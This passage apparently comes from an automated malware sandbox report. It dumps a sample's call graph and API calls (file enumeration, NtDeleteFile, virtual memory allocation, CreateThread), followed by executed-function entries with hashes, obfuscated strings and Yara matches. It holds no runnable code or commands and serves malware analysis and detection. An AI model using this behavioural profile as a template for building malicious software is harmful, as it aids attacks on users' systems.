4c5fc0 LdrLoadDll 103231->103232 103233 4b5ab0 103232->103233 103233->103223 103234 4c4be0 103233->103234 103235 4c4bfa 103234->103235 103236 4c5fc0 LdrLoadDll 103235->103236 103237 4c4c0b 103236->103237 103244 2e72ca0 LdrInitializeThunk 103237->103244 103238 4b5ada 103238->103223 103240 4c54d0 103238->103240 103241 4c54da 103240->103241 103242 4c5fc0 LdrLoadDll 103241->103242 103243 4c54fb 103242->103243 103243->103227 103244->103238 103245 4bf850 103246 4bf878 103245->103246 103247 4b4240 LdrLoadDll 103246->103247 103248 4bf8b2 103247->103248 103249 4b5a60 3 API calls 103248->103249 103251 4bf8d8 103249->103251 103250 4bf8df 103251->103250 103252 4b4240 LdrLoadDll 103251->103252 103253 4bf91b 103252->103253 103254 4b4240 LdrLoadDll 103253->103254 103255 4bf950 103254->103255 103274 4b5b70 103255->103274 103257 4bf974 103258 4bf9b6 103257->103258 103271 4bfb4a 103257->103271 103278 4bf5a0 LdrLoadDll NtClose RtlFreeHeap LdrInitializeThunk LdrInitializeThunk 103257->103278 103260 4b4240 LdrLoadDll 103258->103260 103261 4bf9e7 103260->103261 103262 4b5b70 2 API calls 103261->103262 103265 4bfa0b 103262->103265 103263 4bfa51 103264 4b5b70 2 API calls 103263->103264 103268 4bfa81 103264->103268 103265->103263 103265->103271 103279 4bf5a0 LdrLoadDll NtClose RtlFreeHeap LdrInitializeThunk LdrInitializeThunk 103265->103279 103267 4bfac7 103270 4b5b70 2 API calls 103267->103270 103268->103267 103268->103271 103280 4bf5a0 LdrLoadDll NtClose RtlFreeHeap LdrInitializeThunk LdrInitializeThunk 103268->103280 103272 4bfb26 103270->103272 103272->103271 103281 4bf5a0 LdrLoadDll NtClose RtlFreeHeap LdrInitializeThunk LdrInitializeThunk 103272->103281 103275 4b5b95 103274->103275 103282 4c49c0 103275->103282 103278->103258 103279->103263 103280->103267 103281->103271 103283 4c49da 103282->103283 103284 4c5fc0 LdrLoadDll 103283->103284 103285 4c49eb 103284->103285 103288 2e72c60 LdrInitializeThunk 103285->103288 103286 4b5c09 103286->103257 103288->103286 103289 4bb250 103290 4bb278 103289->103290 103291 4c6ea0 3 API calls 103290->103291 103293 4bb2d8 103291->103293 103292 4bb2e1 103293->103292 103320 4ba5b0 103293->103320 103295 4bb30a 103296 4bb32a 103295->103296 103350 4ba900 LdrLoadDll 103295->103350 103297 4bb348 103296->103297 103352 4bd0e0 LdrLoadDll GetFileAttributesW NtAllocateVirtualMemory RtlFreeHeap 103296->103352 103305 4bb362 103297->103305 103354 4b40b0 LdrLoadDll 103297->103354 103300 4bb318 103300->103296 103351 4baf80 LdrLoadDll RtlFreeHeap 103300->103351 103301 4bb33c 103353 4bd0e0 LdrLoadDll GetFileAttributesW NtAllocateVirtualMemory RtlFreeHeap 103301->103353 103306 4ba5b0 4 API calls 103305->103306 103307 4bb38f 103306->103307 103308 4bb3b0 103307->103308 103355 4ba900 LdrLoadDll 103307->103355 103310 4bb3ce 103308->103310 103357 4bd0e0 LdrLoadDll GetFileAttributesW NtAllocateVirtualMemory RtlFreeHeap 103308->103357 103313 4bb3e8 103310->103313 103359 4b40b0 LdrLoadDll 103310->103359 103311 4bb39e 103311->103308 103356 4baf80 LdrLoadDll RtlFreeHeap 103311->103356 103314 4c6dc0 2 API calls 103313->103314 103317 4bb3f2 103314->103317 103315 4bb3c2 103358 4bd0e0 LdrLoadDll GetFileAttributesW NtAllocateVirtualMemory RtlFreeHeap 103315->103358 103321 4ba648 103320->103321 103322 4b4240 LdrLoadDll 103321->103322 103323 4ba70e 103322->103323 103324 4b4240 LdrLoadDll 103323->103324 103325 4ba73a 103324->103325 103326 4b5b70 2 API calls 103325->103326 103327 4ba75f 103326->103327 103333 4ba8a6 103327->103333 103360 4c4a80 103327->103360 103330 4b9f20 LdrLoadDll 103334 4ba8b7 103330->103334 103331 4ba89c 103332 4c4fe0 2 API calls 103331->103332 103332->103333 103333->103330 103333->103334 103334->103295 103335 4ba798 103336 4c4fe0 2 API calls 103335->103336 103337 4ba7d2 103336->103337 103366 4c6f80 LdrLoadDll 103337->103366 103339 4ba808 103339->103334 103340 4b5b70 2 API calls 103339->103340 103341 4ba82e 103340->103341 103341->103334 103342 4c4a80 2 API calls 103341->103342 103343 4ba853 103342->103343 103344 4ba85a 103343->103344 103345 4ba886 103343->103345 103347 4c4fe0 2 API calls 103344->103347 103346 4c4fe0 2 API calls 103345->103346 103348 4ba890 103346->103348 103349 4ba864 103347->103349 103348->103295 103349->103295 103350->103300 103351->103296 103352->103301 103353->103297 103354->103305 103355->103311 103356->103308 103357->103315 103358->103310 103359->103313 103361 4c4a9d 103360->103361 103362 4c5fc0 LdrLoadDll 103361->103362 103363 4c4aae 103362->103363 103367 2e72be0 LdrInitializeThunk 103363->103367 103364 4ba78d 103364->103331 103364->103335 103366->103339 103367->103364 103368 4b4a90 103371 4b4aba 103368->103371 103369 4b4f28 103370 4bfec0 2 API calls 103372 4b4b59 103370->103372 103371->103369 103371->103370 103372->103369 103394 4b08b0 9 API calls 103372->103394 103374 4b4bc7 103374->103369 103375 4c6dc0 2 API calls 103374->103375 103377 4b4bdf 103375->103377 103376 4b4c0e 103378 4b7020 3 API calls 103376->103378 103382 4b4c15 103376->103382 103377->103376 103413 4a3820 LdrLoadDll LdrInitializeThunk 103377->103413 103379 4b4c4e 103378->103379 103379->103369 103381 4c48b0 2 API calls 103379->103381 103381->103382 103382->103369 103395 4c43a0 103382->103395 103384 4b4cab 103404 4c4420 103384->103404 103386 4b4eb4 103388 4c4520 2 API calls 103386->103388 103390 4b4ed7 103386->103390 103387 4b4ccb 103387->103386 103414 4a3890 LdrLoadDll LdrInitializeThunk 103387->103414 103388->103390 103391 4b71f0 2 API calls 103390->103391 103392 4b4ef7 103390->103392 103391->103390 103415 4c5340 LdrLoadDll 103392->103415 103394->103374 103396 4c43be 103395->103396 103397 4c43f3 103395->103397 103398 4c5fc0 LdrLoadDll 103396->103398 103399 4c5fc0 LdrLoadDll 103397->103399 103401 4c43db 103398->103401 103400 4c4409 103399->103400 103416 2e739b0 LdrInitializeThunk 103400->103416 103401->103384 103402 4c4418 103402->103384 103405 4c4476 103404->103405 103406 4c4441 103404->103406 103408 4c5fc0 LdrLoadDll 103405->103408 103407 4c5fc0 LdrLoadDll 103406->103407 103409 4c445e 103407->103409 103410 4c448c 103408->103410 103409->103387 103417 2e74340 LdrInitializeThunk 103410->103417 103411 4c449b 103411->103387 103413->103376 103414->103386 103415->103369 103416->103402 103417->103411 103418 4bef50 103419 4bef59 103418->103419 103420 4b3f60 LdrLoadDll 103419->103420 103421 4bef88 103420->103421 103422 4c09c0 LdrLoadDll 103421->103422 103439 4bf18c 103421->103439 103423 4befb8 103422->103423 103424 4c09c0 LdrLoadDll 103423->103424 103425 4befd1 103424->103425 103426 4c09c0 LdrLoadDll 103425->103426 103427 4befea 103426->103427 103428 4c09c0 LdrLoadDll 103427->103428 103429 4bf006 103428->103429 103430 4c09c0 LdrLoadDll 103429->103430 103431 4bf01f 103430->103431 103432 4c09c0 LdrLoadDll 103431->103432 103433 4bf038 103432->103433 103434 4c09c0 LdrLoadDll 103433->103434 103435 4bf054 103434->103435 103436 4c09c0 LdrLoadDll 103435->103436 103437 4bf06d 103436->103437 103438 4c09c0 LdrLoadDll 103437->103438 103440 4bf085 103438->103440 103440->103439 103442 4beb10 LdrLoadDll 103440->103442 103442->103440 103443 4b6510 103444 4b653e 103443->103444 103445 4b7020 3 API calls 103444->103445 103446 4b6566 103445->103446 103447 4b656d 103446->103447 103450 4c6ee0 LdrLoadDll RtlAllocateHeap RtlFreeHeap 103446->103450 103449 4b657d 103450->103449 103451 4be9d0 103454 4bd650 103451->103454 103455 4bd676 103454->103455 103456 4b4240 LdrLoadDll 103455->103456 103457 4bd6cd 103456->103457 103458 4bd70d 103457->103458 103459 4b4240 LdrLoadDll 103457->103459 103464 4b7440 103458->103464 103459->103458 103461 4bd7f8 103462 4bd7f1 103462->103461 103469 4bd330 103462->103469 103465 4c09c0 LdrLoadDll 103464->103465 103466 4b745f 103465->103466 103467 4b7471 103466->103467 103468 4b7466 GetFileAttributesW 103466->103468 103467->103462 103468->103467 103470 4bd353 103469->103470 103492 4c1b70 103470->103492 103472 4bd3b5 103472->103462 103473 4bd360 103473->103472 103474 4bd37f 103473->103474 103475 4bd3c1 103473->103475 103476 4bd387 103474->103476 103477 4bd3a4 103474->103477 103480 4b4240 LdrLoadDll 103475->103480 103479 4c6dc0 2 API calls 103476->103479 103478 4c6dc0 2 API calls 103477->103478 103478->103472 103481 4bd398 103479->103481 103482 4bd3e3 103480->103482 103481->103462 103530 4bc670 103482->103530 103484 4bd405 103488 4bd508 103484->103488 103489 4bd41d 103484->103489 103485 4bd4ef 103486 4c6dc0 2 API calls 103485->103486 103487 4bd613 103486->103487 103487->103462 103488->103485 103536 4bcc90 LdrLoadDll NtAllocateVirtualMemory RtlFreeHeap 103488->103536 103489->103485 103535 4bcc90 LdrLoadDll NtAllocateVirtualMemory RtlFreeHeap 103489->103535 103493 4c1b7e 103492->103493 103494 4c1b85 103492->103494 103493->103473 103495 4b3f60 LdrLoadDll 103494->103495 103496 4c1bb7 103495->103496 103497 4c1bc6 103496->103497 103537 4c1640 LdrLoadDll 103496->103537 103499 4c6ea0 3 API calls 103497->103499 103501 4c1dc2 103497->103501 103500 4c1bdf 103499->103500 103500->103501 103502 4c1d6a 103500->103502 103503 4c1bf4 103500->103503 103501->103473 103504 4c1d74 103502->103504 103528 4c1cfc 103502->103528 103538 4bc790 LdrLoadDll 103503->103538 103539 4bc790 LdrLoadDll 103504->103539 103506 4c1c0b 103511 4c09c0 LdrLoadDll 103506->103511 103507 4c6dc0 2 API calls 103507->103501 103509 4c1d8b 103540 4c0f10 LdrLoadDll 103509->103540 103513 4c1c27 103511->103513 103512 4c1da1 103514 4c09c0 LdrLoadDll 103512->103514 103515 4c09c0 LdrLoadDll 103513->103515 103514->103501 103516 4c1c43 103515->103516 103517 4c09c0 LdrLoadDll 103516->103517 103518 4c1c62 103517->103518 103519 4c09c0 LdrLoadDll 103518->103519 103520 4c1c7e 103519->103520 103521 4c09c0 LdrLoadDll 103520->103521 103522 4c1c9a 103521->103522 103523 4c09c0 LdrLoadDll 103522->103523 103524 4c1cb9 103523->103524 103525 4c09c0 LdrLoadDll 103524->103525 103526 4c1cd5 103525->103526 103527 4c09c0 LdrLoadDll 103526->103527 103527->103528 103528->103507 103529 4c1d61 103528->103529 103529->103473 103532 4bc686 103530->103532 103531 4bc693 103531->103484 103532->103531 103533 4c6dc0 2 API calls 103532->103533 103534 4bc6cc 103533->103534 103534->103484 103535->103489 103536->103488 103537->103497 103538->103506 103539->103509 103540->103512 103541 4b2cec 103542 4b6e80 3 API calls 103541->103542 103543 4b2cfc 103542->103543 103544 4b2d2a 103543->103544 103545 4b2d11 103543->103545 103546 4c4fe0 2 API calls 103543->103546 103549 4af770 LdrLoadDll 103545->103549 103546->103545 103548 4b2d1b 103549->103548 103550 4a9860 103551 4a986f 103550->103551 103552 4c09c0 LdrLoadDll 103551->103552 103554 4a9887 103552->103554 103553 4a98ad 103554->103553 103555 4a989a CreateThread 103554->103555 103556 4b9ce0 103561 4b9a10 103556->103561 103558 4b9ced 103581 4b96b0 103558->103581 103560 4b9cf3 103562 4b9a35 103561->103562 103563 4b4240 LdrLoadDll 103562->103563 103564 4b9ac5 103563->103564 103565 4b4240 LdrLoadDll 103564->103565 103566 4b9b24 103565->103566 103567 4b7440 2 API calls 103566->103567 103568 4b9b6b 103567->103568 103569 4b9b72 103568->103569 103570 4c1b70 4 API calls 103568->103570 103569->103558 103572 4b9b80 103570->103572 103571 4b9b89 103571->103558 103572->103571 103573 4b4240 LdrLoadDll 103572->103573 103574 4b9be9 103573->103574 103576 4b9c71 103574->103576 103593 4b9110 103574->103593 103578 4b9cc9 103576->103578 103602 4b9470 103576->103602 103579 4c6dc0 2 API calls 103578->103579 103580 4b9cd0 103579->103580 103580->103558 103582 4b96c6 103581->103582 103587 4b96d1 103581->103587 103583 4c6ea0 3 API calls 103582->103583 103583->103587 103584 4b96e7 103584->103560 103585 4b7440 2 API calls 103585->103587 103586 4b99de 103588 4b99f7 103586->103588 103589 4c6dc0 2 API calls 103586->103589 103587->103584 103587->103585 103587->103586 103590 4b9110 3 API calls 103587->103590 103591 4b4240 LdrLoadDll 103587->103591 103592 4b9470 2 API calls 103587->103592 103588->103560 103589->103588 103590->103587 103591->103587 103592->103587 103594 4b9136 103593->103594 103595 4bc670 2 API calls 103594->103595 103596 4b919d 103595->103596 103598 4b9320 103596->103598 103600 4b91bb 103596->103600 103597 4b9305 103597->103574 103598->103597 103599 4b8fe0 3 API calls 103598->103599 103599->103598 103600->103597 103606 4b8fe0 103600->103606 103603 4b9496 103602->103603 103604 4bc670 2 API calls 103603->103604 103605 4b9512 103604->103605 103605->103576 103607 4b8ff6 103606->103607 103610 4bcb70 103607->103610 103609 4b90fe 103609->103600 103611 4bcbad 103610->103611 103612 4bcc5d 103611->103612 103614 4bcc00 103611->103614 103617 4bdc70 103611->103617 103612->103609 103615 4bcc39 103614->103615 103616 4c6dc0 2 API calls 103614->103616 103615->103609 103616->103615 103620 4bd970 103617->103620 103619 4bdc84 103619->103614 103621 4bd996 103620->103621 103622 4c6d30 2 API calls 103621->103622 103624 4bd9b9 103621->103624 103622->103624 103623 4bdc61 103623->103619 103624->103623 103625 4b4240 LdrLoadDll 103624->103625 103632 4bdaaa 103624->103632 103626 4bdb26 103625->103626 103627 4b4240 LdrLoadDll 103626->103627 103627->103632 103628 4bdc43 103629 4c6dc0 2 API calls 103628->103629 103631 4bdc53 103629->103631 103631->103619 103632->103623 103632->103628 103633 4ab3d0 103632->103633 103634 4c6d30 2 API calls 103633->103634 103635 4aca41 103634->103635 103635->103628 103636 4c3ce0 103637 4c3d3a 103636->103637 103639 4c3d47 103637->103639 103640 4c2290 103637->103640 103641 4c6d30 2 API calls 103640->103641 103643 4c22d1 103640->103643 103641->103643 103642 4c23c6 103642->103639 103643->103642 103644 4b3f60 LdrLoadDll 103643->103644 103645 4c2311 103644->103645 103646 4c09c0 LdrLoadDll 103645->103646 103648 4c2332 103646->103648 103647 4c2340 Sleep 103647->103648 103648->103642 103648->103647 103649 4c4f60 103650 4c4f7e 103649->103650 103651 4c4faf 103649->103651 103653 4c5fc0 LdrLoadDll 103650->103653 103652 4c5fc0 LdrLoadDll 103651->103652 103654 4c4fc5 NtDeleteFile 103652->103654 103655 4c4f9b 103653->103655 103656 4c0520 103657 4c053c 103656->103657 103668 4c4cd0 103657->103668 103660 4c0578 103663 4c4fe0 2 API calls 103660->103663 103661 4c0564 103662 4c4fe0 2 API calls 103661->103662 103664 4c056d 103662->103664 103665 4c0581 103663->103665 103672 4c6ee0 LdrLoadDll RtlAllocateHeap RtlFreeHeap 103665->103672 103667 4c058c 103669 4c4ced 103668->103669 103670 4c5fc0 LdrLoadDll 103669->103670 103671 4c055d 103670->103671 103671->103660 103671->103661 103672->103667 103673 4c45a0 103674 4c45be 103673->103674 103675 4c45ff 103673->103675 103677 4c5fc0 LdrLoadDll 103674->103677 103676 4c5fc0 LdrLoadDll 103675->103676 103678 4c4615 103676->103678 103679 4c45db 103677->103679 103682 2e72ee0 LdrInitializeThunk 103678->103682 103680 4c4630 103682->103680 103683 2e72ad0 LdrInitializeThunk 103684 4b89b1 103692 4b89c0 103684->103692 103685 4b89c7 103686 4c09c0 LdrLoadDll 103686->103692 103687 4b8aac GetFileAttributesW 103687->103692 103688 4b8c5a 103689 4b8c73 103688->103689 103690 4c6dc0 2 API calls 103688->103690 103690->103689 103691 4b4240 LdrLoadDll 103691->103692 103692->103685 103692->103686 103692->103687 103692->103688 103692->103691 103693 4bc670 2 API calls 103692->103693 103696 4c18a0 LdrLoadDll NtAllocateVirtualMemory RtlFreeHeap 103692->103696 103697 4c1740 LdrLoadDll NtAllocateVirtualMemory RtlFreeHeap 103692->103697 103693->103692 103696->103692 103697->103692 103698 4be670 103699 4be6d4 103698->103699 103700 4b4240 LdrLoadDll 103699->103700 103701 4be7c7 103700->103701 103702 4b5a60 3 API calls 103701->103702 103704 4be7fd 103702->103704 103703 4be804 103704->103703 103705 4b4240 LdrLoadDll 103704->103705 103706 4be840 103705->103706 103707 4b5b70 2 API calls 103706->103707 103709 4be880 103707->103709 103708 4be9a3 103709->103708 103710 4be9b2 103709->103710 103732 4be450 103709->103732 103711 4c4fe0 2 API calls 103710->103711 103713 4be9bc 103711->103713 103714 4be8b5 103714->103710 103715 4be8c0 103714->103715 103716 4c6ea0 3 API calls 103715->103716 103717 4be8e9 103716->103717 103718 4be908 103717->103718 103719 4be8f2 103717->103719 103761 4be340 CoInitialize 103718->103761 103720 4c4fe0 2 API calls 103719->103720 103722 4be8fc 103720->103722 103723 4be916 103763 4c4b40 103723->103763 103725 4be992 103726 4c4fe0 2 API calls 103725->103726 103727 4be99c 103726->103727 103729 4c6dc0 2 API calls 103727->103729 103729->103708 103730 4be934 103730->103725 103731 4c4b40 2 API calls 103730->103731 103769 4be270 LdrLoadDll RtlFreeHeap 103730->103769 103731->103730 103733 4be46c 103732->103733 103734 4b3f60 LdrLoadDll 103733->103734 103736 4be487 103734->103736 103735 4be490 103735->103714 103736->103735 103737 4c09c0 LdrLoadDll 103736->103737 103738 4be4ad 103737->103738 103739 4c09c0 LdrLoadDll 103738->103739 103740 4be4c8 103739->103740 103741 4c09c0 LdrLoadDll 103740->103741 103742 4be4e1 103741->103742 103743 4c09c0 LdrLoadDll 103742->103743 103744 4be4fd 103743->103744 103745 4c09c0 LdrLoadDll 103744->103745 103746 4be516 103745->103746 103747 4c09c0 LdrLoadDll 103746->103747 103748 4be52f 103747->103748 103749 4b3f60 LdrLoadDll 103748->103749 103750 4be55b 103749->103750 103751 4c09c0 LdrLoadDll 103750->103751 103760 4be60d 103750->103760 103752 4be583 103751->103752 103753 4b3f60 LdrLoadDll 103752->103753 103754 4be5b8 103753->103754 103755 4c09c0 LdrLoadDll 103754->103755 103754->103760 103756 4be5db 103755->103756 103757 4c09c0 LdrLoadDll 103756->103757 103758 4be5f4 103757->103758 103759 4c09c0 LdrLoadDll 103758->103759 103759->103760 103760->103714 103762 4be3a5 103761->103762 103762->103723 103764 4c4b5a 103763->103764 103765 4c5fc0 LdrLoadDll 103764->103765 103766 4c4b6b 103765->103766 103770 2e72ba0 LdrInitializeThunk 103766->103770 103767 4c4b8a 103767->103730 103769->103730 103770->103767 103771 4b66b0 103772 4b66cc 103771->103772 103776 4b67af 103771->103776 103774 4c4fe0 2 API calls 103772->103774 103772->103776 103773 4b6845 103775 4b66e7 103774->103775 103785 4b5cf0 LdrLoadDll NtClose LdrInitializeThunk LdrInitializeThunk 103775->103785 103776->103773 103786 4b5cf0 LdrLoadDll NtClose LdrInitializeThunk LdrInitializeThunk 103776->103786 103778 4b681f 103778->103773 103787 4b5ec0 LdrLoadDll NtClose LdrInitializeThunk LdrInitializeThunk 103778->103787 103781 4b671f 103782 4b4240 LdrLoadDll 103781->103782 103783 4b674c 103782->103783 103784 4b4240 LdrLoadDll 103783->103784 103784->103776 103785->103781 103786->103778 103787->103773 103788 4bc1f0 103789 4bc212 103788->103789 103790 4b4240 LdrLoadDll 103789->103790 103791 4bc403 103790->103791 103792 4b4240 LdrLoadDll 103791->103792 103793 4bc428 103792->103793 103794 4b4180 LdrLoadDll 103793->103794 103795 4bc43c 103794->103795 103819 4bc0b0 103795->103819 103798 4bc0b0 7 API calls 103799 4bc4b2 103798->103799 103800 4bc0b0 7 API calls 103799->103800 103801 4bc4ca 103800->103801 103802 4bc0b0 7 API calls 103801->103802 103803 4bc4e2 103802->103803 103804 4bc0b0 7 API calls 103803->103804 103805 4bc4fd 103804->103805 103806 4bc0b0 7 API calls 103805->103806 103808 4bc515 103806->103808 103807 4bc52f 103808->103807 103809 4bc0b0 7 API calls 103808->103809 103810 4bc563 103809->103810 103811 4bc0b0 7 API calls 103810->103811 103812 4bc5a0 103811->103812 103813 4bc0b0 7 API calls 103812->103813 103814 4bc5dd 103813->103814 103815 4bc0b0 7 API calls 103814->103815 103816 4bc61a 103815->103816 103817 4bc0b0 7 API calls 103816->103817 103818 4bc657 103817->103818 103820 4bc0d9 103819->103820 103821 4c09c0 LdrLoadDll 103820->103821 103822 4bc116 103821->103822 103823 4c09c0 LdrLoadDll 103822->103823 103824 4bc134 103823->103824 103825 4c09c0 LdrLoadDll 103824->103825 103827 4bc156 103825->103827 103826 4bc1dc 103826->103798 103827->103826 103828 4bc180 FindFirstFileW 103827->103828 103828->103826 103832 4bc19b 103828->103832 103829 4bc1c3 FindNextFileW 103830 4bc1d5 FindClose 103829->103830 103829->103832 103830->103826 103832->103829 103833 4bbfc0 7 API calls 103832->103833 103833->103832 103834 4b51f0 103835 4b71f0 2 API calls 103834->103835 103836 4b5220 103835->103836 103838 4b524c 103836->103838 103839 4b7170 103836->103839 103847 4c4310 103839->103847 103841 4b71b4 103842 4b71d5 103841->103842 103854 4c44a0 103841->103854 103842->103836 103844 4b71c5 103845 4b71e1 103844->103845 103846 4c4fe0 2 API calls 103844->103846 103845->103836 103846->103842 103848 4c432e 103847->103848 103849 4c436b 103847->103849 103850 4c5fc0 LdrLoadDll 103848->103850 103851 4c5fc0 LdrLoadDll 103849->103851 103853 4c434b 103850->103853 103852 4c4381 103851->103852 103852->103841 103853->103841 103855 4c44f6 103854->103855 103856 4c44c1 103854->103856 103857 4c5fc0 LdrLoadDll 103855->103857 103858 4c5fc0 LdrLoadDll 103856->103858 103859 4c450c 103857->103859 103860 4c44de 103858->103860 103863 2e74650 LdrInitializeThunk 103859->103863 103860->103844 103861 4c451b 103861->103844 103863->103861 103864 4c08b0 103868 4c08b4 103864->103868 103865 4c0949 103866 4c0906 103867 4c6dc0 2 API calls 103866->103867 103869 4c0913 103867->103869 103868->103865 103868->103866 103870 4c0944 103868->103870 103871 4c6dc0 2 API calls 103870->103871 103871->103865 103872 4c4d70 103873 4c4d8e 103872->103873 103874 4c4de7 103872->103874 103875 4c5fc0 LdrLoadDll 103873->103875 103876 4c5fc0 LdrLoadDll 103874->103876 103878 4c4dab 103875->103878 103877 4c4dfd NtCreateFile 103876->103877

                                  Executed Functions

                                  Function 004A98C0 Relevance: 42.9, Strings: 34, Instructions: 428COMMON
                                  Download Yara Rule

                                  Control-flow Graph

                                  • Executed
                                  • Not Executed
                                  control_flow_graph 27 4a98c0-4a9c9f 28 4a9cb0-4a9cbc 27->28 29 4a9cbe-4a9cc9 28->29 30 4a9ce5-4a9cef 28->30 32 4a9ccb-4a9ccf 29->32 33 4a9cd0-4a9cd2 29->33 31 4a9d00-4a9d0c 30->31 34 4a9d0e-4a9d1b 31->34 35 4a9d1d-4a9d41 31->35 32->33 36 4a9ce3 33->36 37 4a9cd4-4a9cdd 33->37 34->31 40 4a9d52-4a9d5b 35->40 36->28 37->36 41 4a9d6b 40->41 42 4a9d5d-4a9d69 40->42 44 4a9d72-4a9d79 41->44 42->40 45 4a9d7b-4a9d86 44->45 46 4a9dbe-4a9dc8 44->46 47 4a9d88-4a9d8c 45->47 48 4a9d8d-4a9dbc 45->48 49 4a9dd9-4a9de2 46->49 47->48 48->44 50 4a9e00-4a9e1d 49->50 51 4a9de4-4a9df0 49->51 54 4a9e2e-4a9e3a 50->54 52 4a9dfe 51->52 53 4a9df2-4a9df8 51->53 52->49 53->52 56 4a9e3c-4a9e4b 54->56 57 4a9e4d 54->57 56->54 58 4a9e54-4a9e5d 57->58 60 4a9e5f-4a9e80 58->60 61 4a9e82-4a9e89 58->61 60->58 62 4a9e8b-4a9ebe 61->62 63 4a9ec0-4a9ec9 61->63 62->61 64 4a9ecf-4a9ed3 63->64 65 4aa043-4aa04d 63->65 67 4a9efc-4a9f0f 64->67 68 4a9ed5-4a9efa 64->68 66 4aa05e-4aa067 65->66 70 4aa069-4aa07b 66->70 71 4aa07d-4aa0a4 66->71 69 4a9f20-4a9f29 67->69 68->64 72 4a9f2b-4a9f3d 69->72 73 4a9f3f-4a9f4e 69->73 70->66 74 4aa0aa-4aa0b4 71->74 75 4aa196-4aa19d 71->75 72->69 77 4a9f93-4a9f9d 73->77 78 4a9f50-4a9f5a 73->78 80 4aa0c5-4aa0d1 74->80 81 4aa19f-4aa1b5 75->81 82 4aa1c2-4aa1cc 75->82 85 4a9fae-4a9fb7 77->85 83 4a9f8e 78->83 84 4a9f5c-4a9f7b 78->84 88 4aa0d3-4aa0e5 80->88 89 4aa0e7-4aa0f3 80->89 86 4aa1c0 81->86 87 4aa1b7-4aa1bd 81->87 83->65 90 4a9f8c 84->90 91 4a9f7d-4a9f86 84->91 92 4a9fc8-4a9fd1 85->92 93 4a9fb9-4a9fc6 85->93 86->75 87->86 88->80 95 4aa112-4aa122 call 4c6a50 89->95 96 4aa0f5-4aa110 89->96 90->78 91->90 98 4a9fd3-4a9ff4 92->98 99 4a9ff6-4a9ffc 92->99 93->85 101 4aa127-4aa131 95->101 96->89 98->92 102 4aa000-4aa007 99->102 103 4aa142-4aa14b 101->103 104 4aa009-4aa03c 102->104 105 4aa03e 102->105 106 4aa14d-4aa160 103->106 107 4aa162-4aa16c 103->107 104->102 105->63 106->103 109 4aa17d-4aa189 107->109 109->75 110 4aa18b-4aa194 109->110 110->109
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000010.00000002.4494256773.00000000004A0000.00000040.80000000.00040000.00000000.sdmp, Offset: 004A0000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_16_2_4a0000_print.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID:
                                  • String ID: D$#k$%$'$'\$+!$,B$-|$/$0$3$9$:[$<$=$>$A$LO$P$V-$\3$]4$ch$eT$f$k$l$lg$q$tA$wJ$4$5$F
                                  • API String ID: 0-715490789
                                  • Opcode ID: 12b19ddffbc0dbbffbfd98f83fffe68fffd269e9319a4e358e557fcdbd1feb64
                                  • Instruction ID: ad3550e170ea8038da4351236bd4ae0348f868fc8b6ff88e03ae33a2d60162f0
                                  • Opcode Fuzzy Hash: 12b19ddffbc0dbbffbfd98f83fffe68fffd269e9319a4e358e557fcdbd1feb64
                                  • Instruction Fuzzy Hash: EB329CB0D05268CBEB64CF44C998BDDBBB2BB55308F1081DAD4096B280C7B95ED9CF59
                                  Function 004BC0B0 Relevance: 4.6, APIs: 3, Instructions: 107fileCOMMON
                                  Download Yara Rule
                                  APIs
                                  • FindFirstFileW.KERNELBASE(?,00000000), ref: 004BC191
                                  • FindNextFileW.KERNELBASE(00000000,00000010), ref: 004BC1CE
                                  • FindClose.KERNELBASE(00000000), ref: 004BC1D9
                                  Memory Dump Source
                                  • Source File: 00000010.00000002.4494256773.00000000004A0000.00000040.80000000.00040000.00000000.sdmp, Offset: 004A0000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_16_2_4a0000_print.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: Find$File$CloseFirstNext
                                  • String ID:
                                  • API String ID: 3541575487-0
                                  • Opcode ID: 4b3003cf327491efddb4a02cebe8bf0de7a5893ca6bf1177a5a2ace0b08016f4
                                  • Instruction ID: 1578ad28605df75776caad1d6b675ed8fa00c06c7ac978f13bb0478d4b61c698
                                  • Opcode Fuzzy Hash: 4b3003cf327491efddb4a02cebe8bf0de7a5893ca6bf1177a5a2ace0b08016f4
                                  • Instruction Fuzzy Hash: B431A5B5900308BFDB20DB65CC85FFB777C9B84709F14455EB908A7182DA78AA858FA4
                                  Function 004C4D70 Relevance: 1.6, APIs: 1, Instructions: 87filenativeCOMMON
                                  Download Yara Rule
                                  APIs
                                  • NtCreateFile.NTDLL(?,?,?,?,?,?,?,?,?,?,?), ref: 004C4E2E
                                  Memory Dump Source
                                  • Source File: 00000010.00000002.4494256773.00000000004A0000.00000040.80000000.00040000.00000000.sdmp, Offset: 004A0000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_16_2_4a0000_print.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: CreateFile
                                  • String ID:
                                  • API String ID: 823142352-0
                                  • Opcode ID: 0c373e7cd66555538179ca18aef6187c55962fb60ae2fba02d5c11a5297a2cf7
                                  • Instruction ID: c860b42877bce66a60dc02b3567f6e5e8627865aabe497dca61c69bd4ce7a0e6
                                  • Opcode Fuzzy Hash: 0c373e7cd66555538179ca18aef6187c55962fb60ae2fba02d5c11a5297a2cf7
                                  • Instruction Fuzzy Hash: CB21D0B6201509BBDB54DF99DC81EEB73ADAF8C708F00820DFA1993241D634F8518BA4
                                  Function 004C4EA0 Relevance: 1.6, APIs: 1, Instructions: 79filenativeCOMMON
                                  Download Yara Rule
                                  APIs
                                  • NtReadFile.NTDLL(?,?,?,?,?,?,?,?,?), ref: 004C4F4E
                                  Memory Dump Source
                                  • Source File: 00000010.00000002.4494256773.00000000004A0000.00000040.80000000.00040000.00000000.sdmp, Offset: 004A0000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_16_2_4a0000_print.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: FileRead
                                  • String ID:
                                  • API String ID: 2738559852-0
                                  • Opcode ID: beeaa75b1d5447f27a47e20113100ee912b871afdac0aa22d530aae0ee6485ba
                                  • Instruction ID: 0e960bd12df382426b4e2171bca940f0bd6140a4a80ca9e0bdf7d4c19e90bd7a
                                  • Opcode Fuzzy Hash: beeaa75b1d5447f27a47e20113100ee912b871afdac0aa22d530aae0ee6485ba
                                  • Instruction Fuzzy Hash: F421F3B6200609AFDB14DF99DC81EEB77ADEF8D714F00860DFA1993241D634B9128BA4
